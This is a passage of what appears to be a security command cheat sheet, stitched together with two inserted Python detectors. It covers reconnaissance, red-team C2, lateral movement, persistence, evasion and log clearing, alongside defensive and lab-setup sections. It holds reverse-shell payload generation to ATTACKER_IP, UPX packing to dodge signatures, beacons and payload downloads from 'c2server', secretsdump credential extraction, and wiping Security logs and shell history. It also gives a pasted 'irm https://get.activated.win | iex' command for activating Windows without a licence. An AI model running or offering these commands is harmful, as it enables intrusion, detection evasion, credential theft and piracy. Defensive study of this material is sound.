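    now = datetime.fromisoformat(now_iso)
    return sorted(rec["common_name"] for rec in records
                  if datetime.fromisoformat(rec["not_after"]) < now)


if __name__ == "__main__":
    recs = load(SAMPLE_CRTSH_JSON)
    print(extract_hosts(recs, "example.com"))
    print(unexpected_issuers(recs, ("Let's Encrypt", "DigiCert")))
    print(expired(recs, "2026-03-01T00:00:00"))
```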
Purpose: Discover historical endpoints, parameters, and hidden files from archived snapshots.
waybackurls example.com > wayback.txt
Collects archived URLs related to the target domain.
cat wayback.txt | grep "\.php" > php_endpoints.txt
Filters PHP endpoints for vulnerability analysis.
cat wayback.txt | grep "?" > params.txt
Extracts URLs containing parameters.
Purpose: Visually inspect subdomains, detect misconfigurations, and identify potential takeover opportunities.
cat subs.txt | aquatone -ports 80,443,8080
Scans subdomains and captures screenshots.
aquatone-discover -d example.com
Performs automated subdomain discovery.
aquatone -scan-timeout 3000 -out aquatone_out
Adjusts scan timeout and output directory.
Purpose: Perform in-depth DNS enumeration using passive and active techniques with data correlation.
amass enum -passive -d example.com
Performs passive subdomain enumeration.
amass enum -active -d example.com -p 80,443,8080
Performs active enumeration with port scanning.
amass intel -org "Example Corp"
Collects intelligence related to an organization.
Purpose: Build a large attack surface using multiple passive sources before active scanning.
subfinder -d example.com -all -o subs.txt
Collects subdomains from passive sources without touching the target directly.
assetfinder --subs-only example.com >> subs.txt
Finds additional subdomains to expand the target scope.
sort -u subs.txt -o subs.txt
Removes duplicates and keeps the final unique list.
Purpose: Identify which subdomains are actually alive and serving web content.
httpx -l subs.txt -status-code -title -tech-detect -o live.txt
Checks which hosts respond over HTTP/HTTPS and fingerprints technologies.
cat live.txt | awk '{print $1}' > live_hosts.txt
Extracts clean URLs for further testing.
wafw00f -i live_hosts.txt
Detects WAF presence to plan evasion strategies.
Purpose: Discover hidden endpoints and parameters for deeper vulnerability testing.
gau example.com | tee urls.txt
Fetches historical URLs from public archives to find hidden endpoints.
waybackurls example.com >> urls.txt
Adds more archived URLs from Wayback Machine.
grep "=" urls.txt | sort -u > params.txt
Extracts parameterized URLs useful for injection testing.
Purpose: Quickly triage large URL lists for high-impact vulnerabilities.
nuclei -l live_hosts.txt -severity critical,high -o nuclei_hits.txt
Runs high-impact vulnerability templates to reduce noise.
gf xss params.txt > xss_candidates.txt
Filters URLs likely vulnerable to XSS for manual validation.
gf sqli params.txt > sqli_candidates.txt
Filters URLs likely vulnerable to SQL injection.
Purpose: Confirm vulnerabilities manually to avoid false positives before reporting.
curl -i "https://target.com/search?q=<script>alert(1)</script>"
Tests reflected XSS manually by observing response behavior.
sqlmap -u "https://target.com/item?id=1" --risk=3 --level=5 --batch
Performs deep SQL injection validation in authorized scope.
ffuf -u https://target.com/FUZZ -w params.txt
Fuzzes endpoints to discover hidden functionality.
Purpose: Create reproducible, high-quality vulnerability reports for bug bounty platforms.
mkdir -p reports/screenshots
Creates a structured folder for evidence and screenshots.
echo "Steps to Reproduce" > report.md
Initializes a markdown report template.
zip -r poc.zip reports/
Bundles proof-of-concept evidence for submission.
Purpose: Red-team command-and-control framework for adversary emulation in controlled lab environments.
./teamserver 0.0.0.0 StrongPassword
Starts the C2 team server for collaborative red-team operations.
./cobaltstrike
Launches the client interface to manage beacons and sessions.
beacon> run whoami
Executes a command on an active beacon session.
Purpose: Open-source command-and-control framework used for red-team operations and adversary simulation.
sliver-server
Starts the Sliver command-and-control server.
generate --http 192.168.1.5
Generates a payload that connects back to the C2 server.
use beacon <id>
Interacts with a specific compromised session.
Purpose: Automate exploitation workflows by controlling Metasploit via RPC API for large-scale testing.
msfrpcd -P StrongPass -S -a 127.0.0.1
Starts Metasploit RPC daemon with authentication.
msfconsole -x "db_connect msf:pass@127.0.0.1/msf"
Connects Metasploit to a database for automation.
use auxiliary/scanner/http/title
Loads an auxiliary scanner module for automated recon.
Purpose: Commercial exploitation platform for automated penetration testing and reporting.
coreimpact
Launches the Core Impact GUI client.
connect agent
Connects to deployed agents in a test environment.
run exploit modules
Executes selected exploitation modules.
Purpose: Perform advanced network protocol attacks and lateral movement in enterprise test labs.
psexec.py domain/user:pass@192.168.1.20
Executes commands remotely via SMB in a lab network.
wmiexec.py domain/user:pass@192.168.1.20
Executes commands using WMI for stealthier execution.
secretsdump.py domain/user:pass@192.168.1.20
Extracts credential material from a compromised host.
Purpose: Simulate real-world phishing campaigns to evaluate user awareness and email security controls.
sudo systemctl start gophish
Starts the GoPhish service for managing phishing campaigns.
ssh -L 3333:127.0.0.1:3333 user@redteam-server
Creates a secure tunnel to access the GoPhish admin panel remotely.
firefox http://127.0.0.1:3333
Opens the GoPhish dashboard to configure templates and campaigns.
Purpose: Prepare obfuscated payloads to test endpoint detection and response (EDR) evasion.
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=ATTACKER_IP LPORT=443 -f exe -o payload.exe
Generates an encrypted HTTPS reverse shell payload for Windows testing labs.
upx --best --ultra-brute payload.exe
Compresses and obfuscates the binary to evade basic signature detection.
sigcheck -u payload.exe
Checks digital signature and reputation to understand detection surface.
Purpose: Establish an encrypted C2 channel to simulate advanced adversary communications.
ssh -N -R 8443:localhost:8443 c2@c2server
Creates a reverse SSH tunnel for covert command and control.
socat TCP-LISTEN:8443,fork,reuseaddr TCP:127.0.0.1:4444
Forwards traffic from the exposed port to the internal C2 service.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Creates a self-signed TLS certificate to encrypt C2 communications.
Purpose: Move laterally inside a segmented network using pivoting techniques.
ssh -D 1080 user@compromised-host
Creates a SOCKS proxy tunnel for pivoting into internal network segments.
proxychains nmap -sT 10.10.0.0/24
Scans internal network through the pivot tunnel.
ssh -J user@compromised-host admin@internal-server
Uses SSH jump host to access deeper internal systems.
Purpose: Test detection of persistence mechanisms used by advanced attackers.
(crontab -l 2>/dev/null; echo "*/30 * * * * /usr/bin/curl http://c2server/ping") | crontab -
Creates a recurring beacon to simulate persistence on Linux systems.
schtasks /create /sc minute /mo 30 /tn "Updater" /tr "payload.exe"
Creates a scheduled task on Windows for persistence testing.
crontab -l
Verifies persistence mechanism is active.
Purpose: Simulate stealthy execution using native OS tools to test SOC detection capabilities.
certutil -urlcache -split -f http://c2server/payload.exe payload.exe
Downloads a file using a built-in Windows utility to bypass basic controls.
mshta http://c2server/launcher.hta
Executes remote scripts using trusted Windows binaries.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();
Executes script through a native DLL loader to evade detection.
Purpose: Safely remove artifacts and document lessons learned after an engagement.
wevtutil cl Security
Clears Windows Security logs in a controlled lab environment.
shred -u payload.exe
Securely deletes payload files to prevent recovery.
history -c
Clears shell history to reduce operational traces (authorized labs only).
Purpose: Simulate voice-based social engineering to test employee verification workflows and call-handling procedures.
sudo apt install asterisk
Installs a private PBX system to simulate internal corporate calls.
sudo systemctl start asterisk
Starts the PBX service for creating controlled vishing scenarios.
asterisk -rvv
Opens the interactive console to manage extensions and call flows.
Purpose: Test mobile phishing detection and user awareness through simulated SMS campaigns.
pip3 install flask twilio
Installs libraries required to build a phishing simulation API for SMS testing.
export TWILIO_ACCOUNT_SID=XXXX
Configures API credentials for controlled SMS delivery in a test environment.
python3 smish_server.py
Launches a local SMS phishing simulation server for training labs.
Purpose: Design believable pretext stories to evaluate identity verification and escalation controls.
mkdir pretext-cases
Creates a workspace to document and manage pretexting scenarios.
nano pretext-cases/hr-password-reset.md
Creates a scripted scenario to simulate HR password reset requests.
gpg -c pretext-cases/hr-password-reset.md
Encrypts sensitive pretext scripts to protect red team OPSEC.
Purpose: Quickly triage suspicious binaries to identify indicators of compromise and hidden functionality.
file sample.bin
Identifies the binary type and architecture.
strings -n 6 sample.bin | less
Extracts human-readable strings to discover URLs, API keys, or debug messages.
readelf -h sample.bin
Displays ELF headers to understand compilation details.
Purpose: Observe runtime behavior of malware samples in an isolated sandbox.
strace -f ./sample.bin
Monitors system calls to detect file, process, and network activity.
ltrace ./sample.bin
Traces library calls to identify suspicious API usage.
tcpdump -i lo -nn
Monitors loopback traffic to catch local C2 communications in labs.
Purpose: Modify program logic to understand licensing checks and protection mechanisms.
objdump -d sample.bin | less
Disassembles binary to inspect control flow.
hexedit sample.bin
Allows low-level byte patching for controlled experiments.
cmp original.bin patched.bin
Compares original and modified binaries to document changes.
Purpose: Detect and block malicious USB/HID devices used for payload injection.
# Linux: Block new USB devices by default
echo 'SUBSYSTEM=="usb", ATTR{authorized}="0"' > /etc/udev/rules.d/99-usbblock.rules
# Allow only trusted USB devices (example)
echo 1 | tee /sys/bus/usb/devices/1-1/authorized
# Monitor USB events in real-time
udevadm monitor --environment --udev
Prevents BadUSB attacks, blocks unknown USB devices, and logs USB insertion activity for incident response.
Purpose: Reduce Bluetooth attack surface and detect rogue pairing attempts.
# Enforce non-discoverable mode
bluetoothctl discoverable off
# Remove unknown devices
bluetoothctl remove AA:BB:CC:DD:EE:FF
# Audit controller security
btmgmt info
# Disable Bluetooth when not required
rfkill block bluetooth
Enforces secure Bluetooth posture in corporate endpoints, reduces BLE attack surface, and prevents rogue device abuse.
Purpose: Test Android apps that communicate with BLE devices.
# List devices attached via ADB
adb devices
# Capture Bluetooth logs
adb logcat | grep -i bluetooth
# Decompile APK (static analysis)
apktool d app.apk
# Look for hardcoded BLE UUIDs in the decompiled code
grep -R "0000" -n app/
Helps identify hardcoded BLE UUIDs, weak pairing logic, and insecure data handling in Android ↔ BLE apps.
Purpose: Study BLE MITM attack models in research environments.
# Install bettercap
sudo apt install bettercap
# Launch bettercap BLE mode
sudo bettercap -iface hci0
# Enable BLE recon
ble.recon on
# List discovered BLE devices
ble.show
Demonstrates BLE recon and MITM concepts in controlled labs for understanding attack surfaces and defenses.
Purpose: Test insecure BLE services (read/write without auth) in controlled labs.
# Open an interactive session, connect, and list characteristics
gatttool -I
connect AA:BB:CC:DD:EE:FF
characteristics
# Read characteristic (handle example)
char-read-hnd 0x0025
# Write test payload (lab device only)
char-write-req 0x0025 01020304
Identifies unauthenticated read/write characteristics in BLE devices used in IoT, fitness trackers, and smart locks (lab only).
Purpose: Capture and analyze BLE pairing and data exchange at HCI level.
# Live HCI packet capture
sudo btmon
# Save capture to file
sudo btmon -w ble-capture.log
# Review pairing & encryption events from the saved capture
btmon -r ble-capture.log
Useful for debugging BLE pairing flows, encryption negotiation, and detecting suspicious protocol behavior.
Purpose: Discover BLE devices and enumerate GATT services/characteristics.
# Install BLE tools
sudo apt install bluez
# Scan for BLE devices
sudo btmgmt le on
bluetoothctl scan on
# Connect to device (replace MAC)
bluetoothctl connect AA:BB:CC:DD:EE:FF
# GATT service enumeration
gatttool -I
connect AA:BB:CC:DD:EE:FF
primary
characteristics
Maps BLE services, characteristics, and permissions to identify insecure GATT endpoints in IoT and wearables.
Purpose: Detect exploitation behavior, memory injection, and suspicious process chains.
# Linux: Monitor suspicious process spawning
ps -ef --forest
# Detect hidden processes (compare /proc entry count with ps output)
ls /proc | wc -l && ps aux | wc -l
# Real-time syscall monitoring
auditctl -a always,exit -F arch=b64 -S execve
# Windows: Check suspicious parent-child processes
wmic process get Name,ProcessId,ParentProcessId
Helps identify exploit chains, fileless malware, and abnormal process trees.
Purpose: Detect rogue access points and unauthorized device connections.
# Scan for rogue access points
iw dev wlan0 scan | egrep 'BSS|SSID|signal'
# List connected devices
arp -a
# Block unknown device (example)
iptables -A INPUT -m mac --mac-source AA:BB:CC:DD:EE:FF -j DROP
# Monitor network connections
ss -tulnp
Prevents Evil Twin Wi-Fi attacks and unauthorized device persistence on internal networks.
Purpose: Find attacker persistence via startup scripts, services, and scheduled tasks.
# Linux: Check cron persistence
crontab -l
ls -la /etc/cron.*
# Systemd persistence check
systemctl list-unit-files --type=service
# Windows: Startup entries
wmic startup get Caption,Command
# Scheduled tasks
schtasks /query /fo LIST /v
Detects backdoors, startup persistence, and malware auto-execution techniques.
Purpose: Detect malicious apps, suspicious services, and privilege abuse.
# List installed packages
adb shell pm list packages
# Check running services
adb shell service list
# Find suspicious permissions
adb shell dumpsys package com.target.app | grep permission
# Check device rooting status
adb shell su -c id
Helps detect spyware, stalkerware, and persistence on compromised Android devices.
Purpose: Detect Bluetooth exploitation, unauthorized pairing, and rogue devices.
# Scan nearby Bluetooth devices
bluetoothctl scan on
# List paired devices
bluetoothctl paired-devices
# Block unknown device (example)
bluetoothctl block AA:BB:CC:DD:EE:FF
# Disable Bluetooth interface
rfkill block bluetooth
Prevents BlueBorne-style attacks, unauthorized pairing, and Bluetooth-based lateral movement.
Purpose: Detect command-and-control beaconing patterns from infected devices.
# Zeek: find periodic small outbound connections
cat conn.log | zeek-cut id.orig_h id.resp_h resp_bytes duration | sort | uniq -c
# Suricata: alert on suspicious DNS tunneling
grep "DNS" /var/log/suricata/fast.log
# Elastic SIEM (KQL) – beaconing pattern
destination.ip: * and network.bytes < 200 and event.duration > 30s
Identifies malware C2 traffic by spotting low-volume, periodic outbound connections often used by RATs and botnets.
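The periodic-small-connection heuristic behind the Zeek pipeline above, worked through as an added Python example (not code from the page): it groups constructed conn.log records by source, destination and port, then flags flows whose inter-connection gaps are near-constant and whose payloads stay small. The field order, thresholds and sample records are assumptions.

```python
from collections import defaultdict
from statistics import mean, median, pstdev

# Constructed sample records (not real traffic) in the column order a zeek-cut
# pipeline would emit: ts, id.orig_h, id.resp_h, id.resp_p, orig_bytes, resp_bytes, duration.
# Flow 1: small, every ~60 s (beacon-like). Flow 2: three irregular bulk transfers.
# Flow 3: every 60 s but large (a scheduled backup, not a beacon).
SAMPLE_CONN_LOG = """\
1700000000.0\t10.0.0.7\t203.0.113.9\t443\t120\t80\t0.4
1700000060.2\t10.0.0.7\t203.0.113.9\t443\t118\t82\t0.5
1700000119.9\t10.0.0.7\t203.0.113.9\t443\t121\t79\t0.4
1700000180.1\t10.0.0.7\t203.0.113.9\t443\t119\t81\t0.4
1700000240.0\t10.0.0.7\t203.0.113.9\t443\t120\t80\t0.3
1700000300.3\t10.0.0.7\t203.0.113.9\t443\t120\t80\t0.4
1700000005.0\t10.0.0.8\t198.51.100.4\t443\t900\t65000\t12.0
1700000900.0\t10.0.0.8\t198.51.100.4\t443\t1200\t81000\t30.0
1700001500.0\t10.0.0.8\t198.51.100.4\t443\t400\t20000\t3.0
1700000010.0\t10.0.0.9\t192.0.2.10\t445\t300\t500000\t8.0
1700000070.0\t10.0.0.9\t192.0.2.10\t445\t300\t500000\t8.0
1700000130.0\t10.0.0.9\t192.0.2.10\t445\t300\t500000\t8.0
1700000190.0\t10.0.0.9\t192.0.2.10\t445\t300\t500000\t8.0
1700000250.0\t10.0.0.9\t192.0.2.10\t445\t300\t500000\t8.0
"""


def parse_conn_log(text):
    """Parse zeek-cut style tab-separated lines; skips blank and '#' comment lines."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, orig, resp, port, obytes, rbytes, dur = line.split("\t")
        records.append({
            "ts": float(ts), "orig": orig, "resp": resp, "port": int(port),
            "bytes": int(obytes) + int(rbytes), "duration": float(dur),
        })
    return records


def find_beacons(records, min_conns=5, max_jitter=0.2, max_bytes=500):
    """Flag (src, dst, port) flows that connect at near-constant intervals with little data.

    jitter = population stddev of the gaps between consecutive connections / mean gap.
    A beacon keeps this low even with a sleep-jitter setting; bulk transfers fail the
    byte threshold, and one-off connections never reach min_conns.
    """
    flows = defaultdict(list)
    for r in records:
        flows[(r["orig"], r["resp"], r["port"])].append(r)

    findings = []
    for (orig, resp, port), conns in flows.items():
        if len(conns) < min_conns:
            continue
        conns.sort(key=lambda r: r["ts"])
        gaps = [b["ts"] - a["ts"] for a, b in zip(conns, conns[1:])]
        avg_gap = mean(gaps)
        if avg_gap <= 0:
            continue
        jitter = pstdev(gaps) / avg_gap
        size = median(r["bytes"] for r in conns)
        if jitter <= max_jitter and size <= max_bytes:
            findings.append({
                "orig": orig, "resp": resp, "port": port, "connections": len(conns),
                "interval_s": round(avg_gap, 1), "jitter": round(jitter, 3),
                "median_bytes": size,
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_conn_log(SAMPLE_CONN_LOG)):
        print(finding)
```

Raising max_bytes makes the backup flow show up too, which is the false-positive class the byte threshold exists to suppress.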
Purpose: Detect SQLi, RCE, and webshell uploads in real-world web servers.
# Apache: detect command injection attempts (shell metacharacters in requests)
grep -Ei '(;|\|\||`|\$\()' /var/log/apache2/access.log
# Detect webshell patterns (ERE needed for the | alternation)
grep -RE 'eval\(|base64_decode\(' /var/www/html
# ModSecurity: review critical alerts
grep "CRITICAL" /var/log/modsec_audit.log
Helps detect active exploitation attempts and malicious file uploads on production web servers.
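The same two checks as an added Python example (not the page's own code), with the caveat the raw greps miss: request targets are URL-decoded before matching, so an encoded `%3B` is caught as `;`. The log lines and PHP snippets are constructed; the extra markers (`&&`, `system`, `shell_exec`, `passthru`) and the two-level severity are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not real traffic). The injection attempts are
# URL-encoded, which a grep over the raw log file does not see.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Mar/2024:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2024:10:01:09 +0000] "GET /ping.php?host=127.0.0.1%3Bid HTTP/1.1" 200 233 "-" "curl/8.0"',
    '198.51.100.2 - - [10/Mar/2024:10:02:15 +0000] "GET /search?q=cat%7C%7Cwhoami HTTP/1.1" 200 101 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [10/Mar/2024:10:03:40 +0000] "POST /upload.php HTTP/1.1" 302 0 "-" "python-requests/2.31"',
    '192.0.2.9 - - [10/Mar/2024:10:04:00 +0000] "GET /cmd.php?x=%24%28uname%20-a%29 HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

# Constructed PHP snippets standing in for files under /var/www/html. avatar.php is a
# legitimate base64 use (a false positive for the page's grep); cache.php has the
# eval(base64_decode(...)) shape with the payload elided.
SAMPLE_PHP_FILES = {
    "avatar.php": '<?php $img = base64_decode($row["avatar"]); header("Content-Type: image/png"); echo $img;',
    "cache.php": '<?php eval(base64_decode("...")); ?>',
    "index.php": '<?php echo "hello"; ?>',
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# The metacharacters the page greps for (; || ` $( ), plus &&, applied after URL decoding.
INJECTION_RE = re.compile(r"(;|\|\||&&|`|\$\()")
# Webshell markers: the page's eval/base64_decode plus the usual exec sinks (assumption).
WEBSHELL_RE = re.compile(r"\b(eval|base64_decode|system|shell_exec|passthru)\s*\(")
HIGH_RISK = {"eval", "system", "shell_exec", "passthru"}


def scan_access_log(lines):
    """Return requests whose decoded target contains shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log format; skip rather than crash on junk
        decoded = unquote_plus(m["target"])
        if INJECTION_RE.search(decoded):
            hits.append({"ip": m["ip"], "method": m["method"],
                         "target": decoded, "status": int(m["status"])})
    return hits


def scan_php_source(name, source):
    """Classify one PHP file: 'high' if an exec sink is called, 'review' if only
    base64_decode appears (common in benign code), None if nothing matched."""
    funcs = set(WEBSHELL_RE.findall(source))
    if not funcs:
        return None
    severity = "high" if funcs & HIGH_RISK else "review"
    return {"file": name, "functions": sorted(funcs), "severity": severity}


def scan_webroot(files):
    """Run scan_php_source over a {filename: source} mapping, dropping clean files."""
    return [r for r in (scan_php_source(n, s) for n, s in files.items()) if r]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("request:", hit)
    for finding in scan_webroot(SAMPLE_PHP_FILES):
        print("file:", finding)
```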
Purpose: Hunt for persistence mechanisms left by attackers.
# Linux: cron job persistence
ls -la /etc/cron* /var/spool/cron/
# Check startup services
systemctl list-unit-files --type=service | grep enabled
# Find autostart files modified in the last 3 days
find /etc/init.d /etc/systemd/system -type f -mtime -3
Detects attacker persistence such as malicious cron jobs, startup services, and backdoor binaries.
Purpose: Detect early indicators of ransomware encryption activity.
# Detect mass file modifications
auditctl -a always,exit -F arch=b64 -S unlink,rename -k ransomware_activity
# Monitor sudden high I/O
iotop -oPa
# Find suspicious encryption tools
ps aux | grep -E "openssl|gpg|crypt"
Flags ransomware behaviors such as mass file deletion/renaming and suspicious encryption processes.
Purpose: Collect volatile evidence from compromised devices safely.
# Capture running processes and network connections
ps auxf > ir_processes.txt
ss -tunap > ir_network.txt
# Memory snapshot (if LiME installed)
insmod lime.ko "path=/mnt/usb/memory.lime format=lime"
# Hash critical binaries
sha256sum /bin/* > ir_hashes.txt
Preserves forensic evidence before attackers can clean traces, enabling root-cause analysis.
Purpose: Match Indicators of Compromise (IOCs) against logs and endpoints.
# Match malicious IPs against firewall logs
grep -Ff ioc_ips.txt /var/log/iptables.log
# Check hashes against known malware
sha256sum suspicious.bin | grep -Ff bad_hashes.txt
# DNS logs IOC matching
grep -Ff ioc_domains.txt /var/log/zeek/dns.log
Enriches detections using threat intelligence feeds to identify known malware infrastructure.
Purpose: Instantly isolate compromised devices from the network.
# Block outbound traffic from compromised host
iptables -I OUTPUT -j DROP
# Disable compromised user account
usermod -L compromised_user
# Kill suspicious process
kill -9 1337
# Revoke SSH access
sed -i 's/^AllowUsers.*/AllowUsers admin/' /etc/ssh/sshd_config
systemctl restart ssh
Enables rapid containment to stop data exfiltration and lateral movement during active incidents.
Purpose: Display cinematic hacker-style terminal screens for demos or content creation.
# Install and run
sudo apt update
sudo apt install hollywood
hollywood
Shows animated fake hacking dashboards. Useful for presentations, videos, and learning terminal layouts without doing real attacks.
Purpose: Show Matrix-style falling green code in terminal.
# Install and run
sudo apt install cmatrix
cmatrix -a -b -u 5
Purely visual effect. Useful to customize terminal demos or hacker-themed screenshots/videos.
Purpose: Display OS, kernel, CPU, RAM, GPU info with Kali logo.
# Install and run
sudo apt install neofetch
neofetch
Shows your system configuration in a stylish banner. Commonly used in screenshots and setup verification.
Purpose: Monitor CPU, RAM, processes, and system load interactively.
# Install and run
sudo apt install htop
htop
Real-time monitoring of running processes. Helps debug heavy tools, crashes, or performance issues.
Purpose: Show animated ASCII fish aquarium in terminal.
# Install and run
sudo apt install asciiquarium
asciiquarium
Fun terminal animation. Useful for terminal customization, breaks during study, or hacker-themed visuals.
Purpose: Create large ASCII art text banners.
# Install
sudo apt install toilet figlet
# Examples
figlet "ARG CYBER"
toilet "KALI LINUX" -f big -F border
Generates big text banners for scripts, screenshots, and terminal branding.
Purpose: Colorize terminal output with rainbow effects.
# Install
sudo apt install lolcat
# Examples
neofetch | lolcat
figlet "WELCOME" | lolcat
Adds colorful output to commands. Often used for custom scripts and terminal branding.
Purpose: Print messages with ASCII characters.
# Install
sudo apt install cowsay
# Examples
cowsay "Hack the planet (legally)"
fortune | cowsay -f dragon
Fun messages for scripts, terminal greetings, and learning shell piping.
Purpose: Funny train animation in terminal when you type wrong command.
# Install
sudo apt install sl
# Examples
sl
sl -a
sl -l
sl -F
Fun prank tool, terminal animation practice, and Linux terminal familiarity.
Purpose: Play the 2048 game inside terminal.
# Install
sudo apt install 2048-c
# Examples
2048-c
Improves keyboard handling, terminal gaming, and focus training.
Purpose: Print colorful and stylish ASCII text in terminal.
# Install
sudo apt install toilet
# Examples
toilet HACKER
toilet -f big HACKER
toilet -f mono12 -F metal HACKER
Used for terminal banners, hacking-themed headers, and shell customization.
Purpose: View Markdown files beautifully inside terminal.
# Install
sudo apt install glow
# Examples
glow README.md
glow notes.md
Great for viewing docs, README files, and learning Markdown in terminal UI.
Purpose: Measure how long a command takes to execute.
# Built-in command (no install needed)
time ls
time ping -c 4 google.com
Useful for performance testing, script optimization, and command benchmarking.
Purpose: Navigate files with Vim-style keybindings.
# Install
sudo apt install ranger
# Examples
ranger
Fast file navigation for payloads, wordlists, scripts, and loot directories.
Purpose: Monitor CPU, RAM, and running processes in real time.
# Install
sudo apt install htop
# Examples
htop
Useful during brute-force labs, payload execution monitoring, and resource analysis.
Purpose: List files with colors, icons, and git status.
# Install
sudo apt install exa
# Examples
exa
exa -l
exa -la --git
Improves terminal UX, directory auditing, and file reconnaissance.
Purpose: View files with syntax highlighting, line numbers, and git integration.
# Install
sudo apt install bat
# Examples
bat script.sh
bat README.md
Better than cat for reading code, configs, and hacking scripts safely.
Purpose: Create an isolated virtual lab to practice security testing safely.
# Update system first
sudo apt update && sudo apt upgrade -y
# Check network
ip a
ip route
Install Kali Linux inside VirtualBox. Use NAT or Host-Only network to keep your lab isolated from the real internet. This prevents accidental attacks on real systems and keeps your practice environment legal.
Purpose: Practice common web vulnerabilities like SQLi, XSS, CSRF locally.
# Install Apache, PHP, MySQL
sudo apt install apache2 php php-mysqli mariadb-server -y
# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
# Permissions
sudo chown -R www-data:www-data dvwa
sudo chmod -R 755 dvwa
# Start services
sudo systemctl start apache2
sudo systemctl start mariadb
DVWA is an intentionally vulnerable web application. It helps beginners understand how web attacks work in a legal lab. Access in browser: http://127.0.0.1/dvwa and complete the setup page.
Purpose: Setup database backend for DVWA.
# Login to MariaDB
sudo mysql -u root
# Inside MySQL
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
DVWA requires a database to store users and vulnerable data. These credentials are for local lab only. Never use weak passwords like this on real servers.
Purpose: Modern vulnerable web app for bug bounty style practice.
# Install Docker
sudo apt install docker.io -y
sudo systemctl start docker
sudo systemctl enable docker
# Run Juice Shop
sudo docker run -d -p 3000:3000 bkimminich/juice-shop
OWASP Juice Shop simulates real-world web app vulnerabilities found in bug bounty programs. Access in browser: http://127.0.0.1:3000
Purpose: Practice network & service exploitation in a full vulnerable OS.
# Check target IP
nmap -sn 192.168.56.0/24
# Scan services
nmap -sC -sV 192.168.56.101
Metasploitable2 is a purposely vulnerable Linux VM. Place it in Host-Only network with Kali. This allows safe exploitation practice without exposing real networks.
Purpose: Prevent lab machines from accessing the real internet.
# Check interfaces
ip a
# VirtualBox recommended: Host-Only Adapter, or NAT + Host-Only (dual NIC)
Using Host-Only networking ensures attacks remain inside your local lab. This is critical for legal and ethical security testing.
Purpose: Restore clean state after attacks or misconfigurations.
# Take VM snapshot (VirtualBox GUI)
Machine -> Take Snapshot
# Reset services
sudo systemctl restart apache2
sudo systemctl restart mariadb
sudo docker restart $(sudo docker ps -q)
Snapshots let you revert the lab after breaking things during practice. This is how real-world testers maintain clean testing environments.
Purpose: Verify Windows activation status, troubleshoot licensing, and manage KMS/MAK activation in compliant enterprise environments.
# Check Windows edition & activation status
slmgr /dli
slmgr /xpr
# Detailed license information
slmgr /dlv
# View the OEM product key embedded in firmware (if present)
wmic path SoftwareLicensingService get OA3xOriginalProductKey
# Set enterprise KMS server (authorized environment)
slmgr /skms kms.yourcompany.local
# Activate against authorized KMS
slmgr /ato
# Clear cached KMS (troubleshooting)
slmgr /ckms
# Reset licensing timers / grace period (troubleshooting)
slmgr /rearm
Used by enterprise admins to validate activation state, troubleshoot KMS connectivity, ensure compliance with licensing, and resolve activation issues without violating software terms.
Purpose: Activate Windows without purchasing a Microsoft product key.
Process:
1. Open PowerShell (Run as Administrator).
2. Type or paste this command.
3. Choose an activation option.
irm https://get.activated.win | iex
Activates Windows 10/11 and Microsoft Office (Excel, Word, etc.) and unlocks the full set of personalization features.
Purpose: Install and manage Kali Linux on Windows using PowerShell (WSL) for legal penetration testing labs.
# Enable WSL & Virtual Machine Platform (Run PowerShell as Admin)
dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
# Set WSL 2 as default
wsl --set-default-version 2
# Install Kali Linux from Microsoft Store (CLI way)
wsl --install -d kali-linux
# Verify installed distros
wsl -l -v
# Launch Kali Linux
wsl -d kali-linux
# Update Kali packages after first launch
sudo apt update && sudo apt full-upgrade -y
Installs Kali Linux inside Windows using WSL2 for ethical hacking practice, labs, tool testing, and cybersecurity training without dual-boot or virtual machine overhead.
Purpose: Perform deep system reconnaissance and live monitoring on Windows endpoints.
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
Get-NetTCPConnection -State Established
Get-Service | Where-Object {$_.Status -eq "Running"}
Get-EventLog -LogName Security -Newest 20
Identifies top resource-consuming processes, active network connections, running services, and recent security events for threat hunting and incident response.
Purpose: Harden Windows endpoints and reduce common attack surfaces.
Set-MpPreference -DisableRealtimeMonitoring $false
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Set-ExecutionPolicy RemoteSigned -Scope LocalMachine
Get-NetFirewallProfile | Set-NetFirewallProfile -Enabled True
Enforces Defender protection, disables legacy SMBv1, locks PowerShell execution policy, and ensures firewall is enabled on all profiles.
Purpose: Detect suspicious persistence mechanisms and startup abuse.
Get-CimInstance Win32_StartupCommand
Get-ScheduledTask | Where-Object {$_.State -ne "Ready"}
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike "*system32*"}
Enumerates startup entries, scheduled tasks, autorun registry keys, and suspicious services for persistence detection.
Purpose: Identify abnormal network activity and possible lateral movement.
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"}
Get-SmbSession
Get-NetNeighbor
arp -a
Detects suspicious internal connections, SMB sessions, ARP mappings, and unusual peer communications inside corporate networks.
Purpose: Analyze authentication events and potential credential abuse.
Get-EventLog -LogName Security -InstanceId 4624 -Newest 20
